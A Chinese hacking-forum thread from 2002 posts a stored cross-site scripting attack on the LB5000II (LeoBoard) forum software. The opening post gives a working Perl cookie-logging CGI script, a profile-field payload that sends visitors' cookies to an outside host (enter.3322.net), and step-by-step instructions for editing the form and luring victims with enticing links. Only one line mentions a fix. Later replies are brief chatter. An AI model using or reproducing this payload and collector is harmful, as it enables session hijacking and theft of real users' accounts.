幸福的傻瓜 发表于 2002-6-6 11:05:22

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

漏洞描述:
LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
版本是LB5000II v20317b,可以http://www.leoboard.com下载。
其注册模块未过滤用户资料   最高学历:职业状况:等注册信息
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
进行攻击,进一步可以通过某中方式收集。测试通过
测试程序:
参考漏洞描述。
解决方案:
对用户提交的资料进行过滤
   

请在s8s8论坛访问
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
那么你在s8s8.net 的cookie将被我所获取.
#!/usr/bin/perl
#leo.cgi
$url="http://www.s8s8.net";;
$method=$ENV{"REQUEST_METHOD"};
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
$remote_addr=$ENV{"REMOTE_ADDR"};
$buffer=~tr/+/ /;
$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg;
$buffer=$buffer."|$remote_addr\n";
open(FILE,">>leo.txt");
print FILE $buffer;
close(FILE);                     
print "Location:$url\n\n";
上面是我的cookie收集脚本
------------------------------------------------------------------------------
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试
用大刀队登陆s8s8论坛,编辑个人资料,
用记事本打开编辑网页
<option value="中专">中专</option>这一项改成
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.cookie)</s cript>">中专</option>   

编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data">
改为
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。
为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
什么算诱惑力呢,自己发挥吧。

lostway 发表于 2002-6-8 12:21:09

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我连怎么设置超连接都不懂~~~汗~!能教教我吗?
(我指在贴上设置)

YES东 发表于 2002-6-24 19:03:26

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我们的论坛虽然是使用这个程序!但没这个问题!

幸福的傻瓜 发表于 2002-6-25 11:25:20

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

那当染好了啊
页: [1]
查看完整版本: 雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统